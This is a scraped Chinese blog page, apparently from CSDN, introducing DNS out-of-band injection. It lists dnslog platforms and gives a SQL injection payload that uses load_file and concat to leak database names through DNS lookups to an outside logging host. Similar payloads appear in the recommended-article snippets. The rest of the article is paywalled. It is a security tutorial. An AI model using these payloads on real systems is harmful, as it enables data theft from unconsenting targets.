dns带外注入

已于 2022-02-10 18:24:02 修改
阅读量3k 收藏 9
点赞数 1
分类专栏: web漏洞 文章标签: 服务器 安全 http web安全
于 2021-12-20 16:06:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36375207/article/details/122041212
版权
DNS带外注入是一种在web漏洞无回显情况下,通过DNS日志获取查询内容的技术。本文介绍DNS带外注入的概念,常用的dnslog平台,并通过联合sql盲注、xss、命令执行和xxe、ssrf的实例展示其应用,帮助安全研究人员更有效地利用这种技术。
摘要由CSDN通过智能技术生成

目录

 前言

一、DNS带外注入是什么?

二、dnslog的常见平台

三、实战

1. 联合sql盲注

2.联合xss

 3.命令执行

4.xxe和ssrf

总结

参考资料



 

 前言

        我们常见的sql注入、xss、xxe、ssrf等web漏洞都会存在无回显的情况,为了更方便的获取到查询的内容,因此有了DNS带外注入。


一、DNS带外注入是什么?

        DNS即域名解析协议,用于ip和域名之间的相互解析,而dnslog就是记录了你对此域名或者ip的访问信息(即日志记录),在上述漏洞的盲注中,我们将查询结果拼接到dns服务器域名上面进行请求,那么dns服务器就会收到拼接后的字符串,也就看到了回显的结果,完成盲注。




二、dnslog的常见平台

http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io

三、实战

1. 联合sql盲注

        如某个注入点为?id=1,则在之后拼接上and if((select load_file(concat('\\\\',(select database()),'.xxxx.ceye.io\\aaa'))),1,1)--+,然后就可以在ceye服务器上接收到需要查询的数据,需要注意的是这里的数据库权限必须有load_file权限,最好是root,可以用show global variables like '%secure%',secure_file_priv必须为空才能读取文件,为null则不能读取文件

最低0.47元/天 解锁文章
scu_hacker
关注
专栏目录
数据库手动注入到提权(Oracle、PostgreSQL、联合查询、布尔注入、报错注入、延时注入、堆查询注入带外注入、写WebShell)
墨痕诉清风的博客
07-24 654
Oracle类型判断PostgreSQL类型判断(特有的语法)
mysql dns 注入_数据库DNSLog外带注入-总结
weixin_29279047的博客
01-19 979
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等将数据带出。of course!这里主讲DNSlog外带注...
写bat脚本双击执行
qq_35911118的博客
04-08 2933
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
【技巧】DNSlog外带文件
最新发布
qinjilll的博客
08-23 1169
我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名等的访问信息,类似日志文件。我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功。
DNS外带注入
weixin_52501704的博客
10-09 1524
DNS外带注入
SQL注入DNSLog外带注入
dragon的博客
02-21 2904
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
sql注入——dns带外注入
cxrpty的博客
02-10 3642
以sql labs8为例 1.搜索dns.log在线软件,并get一个域名 2.在cmd中ping该域名,发现解析成功 3.在sql labs8中输入http://localhost/sqli-labs-master/Less-8/?id=1' and load_file("\\\\sss.cipv66.dnslog.cn\\xxx.txt") -- -,并执行 4.在dn...
DNS_LOG注入
学习、分享、交流
05-19 1623
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···
DNS外带注入SQLMAP
qq_31088019的博客
08-06 601
dns外带数据
dns缓存
qq_35543858的博客
01-25 786
查看dns缓存 ipconfig/displaydns 清除dns缓存 ipconfig/flushdns DNS缓存介绍 记录种类 A记录是指定域名对应的IP地址。 AAAA记录一个域名对应的IPv6地址 NS记录 是指定由哪个DNS服务器解析你的域名。 MX记录 是指邮件交换记录,记录了在当前网络下,存在的mail服务器 CNAME记录 是指别名记录,允许多个域名对应一个ip ...
渗透测试---手把手教你SQL注入(4)--DNSLOG外带注入
weixin_52796034的博客
10-10 960
通常我们面对SQL注入过程中没有回显的情况时,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,需要花费大量时间进行测试,并且还可能需要对目标服务器发送大量请求,这会导致我们的IP容易被目标服务器封掉.
DNSlog外带原理及注入分析
热门推荐
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
DNSlog外带数据注入
C_LCH_2000的博客
08-04 1471
盲注代替 DNS log即DNS日志,域名解析的记录。
MySQL注入Dns 注入
baimaozi008的博客
05-29 1100
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。然后1806dl.dnslog.cn的子域名的解析都是在某台服务器,然后他记录下来了有人请求访问了error.1806dl.dnslog.cn,然后在DnsLog这个平台上面显示出来了。
dnslog外带是什么
来而不往非礼也
05-14 1398
在看hw面经的时候发现了dnslog外带的相关的知识点,有点迷惑,所以写下这篇文章记录,方便日后查阅。
DNS外带】
==
03-01 841
DNS_LOG外带 DNSLOG.cn (实际情况中你发现渗透的时候,有布尔型注入,但是很花时间,你有什么别的方法能够加快时间- 解决办法DNS_LOG外带) 普通DNS外带 http://dnslog.cn/ select load_file(concat('\\\\',(select database()),'.tqfkcu.dnslog.cn/abc')) 通过16进制编码DNS外带 select load_file(concat('\\\\',(select substr..
postgresql 带外注入
SopRomeo的博客
01-31 683
最近某秋弄了个比赛,有个题是FBCTF的原题魔改的脑洞题 记录下 postgresql带外注入(FBCTF) FBCTF详解 解题 这题就是脑洞,flag名字在.htaccess文件里,提示也只说flag在web的某个目录下,真鸡巴离谱,这题的数据库用户权限很低,只有查询权限,RCE是很困难的 我用的是外联数据库的方法 vps环境:Ubuntu18.04 apt install 安装即可 百度有 修改配置文件 设置 listen_addresses = ‘*’ 重启服务 手机访问 f12体验苹果6 用上
DNS攻击类型与域名系统详解
DNS缓存毒药攻击则是通过注入错误的DNS记录到缓存服务器,使用户访问到假的网站。 理解这些攻击方式对于网络安全至关重要,因为它们可能导致数据泄露、身份盗用或其他严重后果。为了防御这些攻击,需要实施安全措施...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值